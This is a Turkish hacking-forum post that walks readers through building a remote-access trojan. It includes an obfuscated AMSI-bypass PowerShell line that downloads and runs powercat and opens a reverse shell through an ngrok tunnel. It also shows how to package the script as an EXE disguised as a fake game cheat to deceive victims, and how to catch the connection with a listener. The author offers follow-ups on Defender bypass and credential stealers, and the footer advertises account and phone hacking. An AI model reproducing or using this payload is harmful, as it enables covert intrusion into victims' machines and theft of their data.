Buradaki isteğim sizden tcp:// hariç 0.tcp.eu.ngrok.io kısmını alıp ngrok_host olarak kullanmanız. çift noktadan sonraki 5 basamaklı sayıyıda ngrok_portta kullanmanızdan yöne olur. (çift nokta dahil değil ve ngrok port host nedir diye sormayın altta ona da değineceğim.)

6. Burdan sonrası basit zaten. bir txt dosyası oluşturup alttaki uzun kodu tümüyle kopyalaıp oraya yapıştırın.
ve bu koddaki yani amsibypass base64 kodundaki bazı belli başlı yerleri değiştireceğiz

Amsibypass kodu:
[Ref].Assembly.GetType('Sys'+'te'+'m.Ma'+'na'+'g'+'em'+'ent.Au'+'tom'+'ati'+'on.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQ'+'B'+'tA'+'HM'+'Aa'+'Q'+'BV'+'AH'+'Q'+'Aa'+'QBs'+'AH'+'MA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQ'+'BtA'+'HM'+'A'+'aQB'+'J'+'AG4'+'AaQB'+'0A'+'EYAY'+'Q'+'BpA'+'GwAZ'+'QBk'+'AA=='))),'NonPublic,Static').SetValue($null,$true);IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ngrok_host -p ngrok_port -e cmd

Bu kodda sadece ngrok_ip ve ngrok_portu silip değiştirip ngrok bağlantısında ki o anlattığım ip ve portu gireceksin.
sonra da txt uzantısını ps1 yapacağız. çünkü bu bir powershell kodu

ŞU ANDA ZARARLIMIZ HAZIR! FAKAT;
kimse resmen "ben bir zararlıyım!" diye bağıran yapıdaki bir dosyayı açmaz ne kadar uyarı vs vermiyecek olsa da O YÜZDEN NE YAPACAĞIZ? BU DOSYAYI EXE YAPACAĞIZ.

6. Ps1 dosyalarını exeye dönüştürmemize yarayan bir program var ismi Ps2Exe
allah var çok güzel uygulama


kullanımı çok basit zaten o copyright sürüm vs yerlere sallayın bişiler ama onların bir altındaki tikli kutulardaki ilk tiki kaldırmanız gerekli!


bir exe dosyasıyla (mesela çalışmadığını bildiğiniz gui arayüzlü robux hilesi exe ya da kendinizde de 1 saat falan uğraşarak dandik bişi yapabilirsiniz) bir exeyle birleştirip inandırıcılığı bir üst seviyeye taşıyabilirsiniz.

7. Bağlantı almak için powercat kullanacağız
linux sistemler için "apt install powercat" yeterli olacaktır

bağlantıyı almakta dikkat etmeniz gereken bir husus var.
o da ngrok bağlantısını açarken port olarak ne kullanmışız?
komutumuz "./ngrok tcp 8000" yani bizim 8000 portunu dinlemeye almamız lazım.

bu durumda kullanacağımız komut
"powercat -l -p 8000 "

ama şöyle bir durum var eğer ki sürekli log bekleyip logun ne zaman düşeceğinden emin değilseniz sürekli açık kalmasını istiyorsanız
"powercat -l -p 8000 -rep"
kullanımı daha uygun olur. rep komutuyla birlikte zaman aşımı derdini ortadan kaldırırsınız.

İŞTE SONUÇ
:)





derseniz ki bize grabber stealer tarzı bişiler lazım o zamanda bu yapılan trojan sayesinde özel kodlar kullanarak defenderi bypasslayıp ne kadar boktan fudu olan bir grabber stealer olursa olsun sisteme sokup tüm hesap ve bilgi loglarını almayı da gösterebilirim. Tabii eğer ki güzel bir tepki gelirse.

aynı zamanda bir oyun hilesi ya da herhangi bir exeye bu yaptığımız exeyi nasıl gizleyebiliriz gibi konuları da çok tepki gelirse anlatmak isterim.

kriptografi bilmeden en fazla bu kadar fudlayabilirsiniz. (ücretli ya da cracklenip sunulan fudlama programları hariç tabii ki)

İYİ RATLAMALAR :*
*** Hidden text: cannot be quoted. ***
 

Konuyu görüntüleyen kullanıcılar:

Hukuksal Sorunlar İçin[email protected]
For Legal Problems[email protected]
Hacktivizm.Org
Hacktivizm.Org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Hacktivizm.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Hacktivizm saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Hacktivizm üyelerinin yaptığı bireysel hack faaliyetlerinden Hacktivizm sorumlu değildir. Sitelerinize Hacktivizm ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz. Sitemizde yer alan içerikler hakkındaki şikayetlerinizi Buradan iletişime geçerek bildirebilirsiniz. Please Report Abuse, DMCA, Scamming, Harassment, Crack or any Illegal Activities to [email protected]
Hack Forum
Hacktivizm, 2020 yılında kurulmuş bir siber güvenlik forum sitesidir aynı zamanda hack forumu,hack sitesi,hack forum ve Türk hack forumudur. Hack forum aramalarında ilk sayfada olan bu hack forum sitesi gün geçtikçe gelişmektedir. Hack Forum kelimesinin anlamı ise, hacker kültürü ve bilgisayar güvenliği ile ilgili tartışmalara adanmış bir İnternet forumudur. Web sitesi, analiz şirketi Alexa Internet tarafından web trafiği açısından "Hacking" kategorisinde bir numaralı web sitesi olarak yer almaktadır.

Telefon Takip - İphone Hackleme - PDF Şifre Kırma - Telefon Hackleme - İnstagram Hesap Çalma - Twitter Hesap Çalma - Facebook Hesap Çalma - Wifi Şifre Kırma - Telefon Şifresi Kırma

Hacktivizm Twitter Hacktivizm Youtube Hacktivizm İnstagram Hacktivizm Telegram

Üst